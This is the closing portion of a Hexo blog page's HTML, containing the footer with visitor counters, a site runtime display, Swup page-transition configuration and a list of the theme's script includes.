            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Saofe1a</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        13 posts in total
                    </span>
                    
                        <span>
                            16.7k words in total
                        </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.4</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
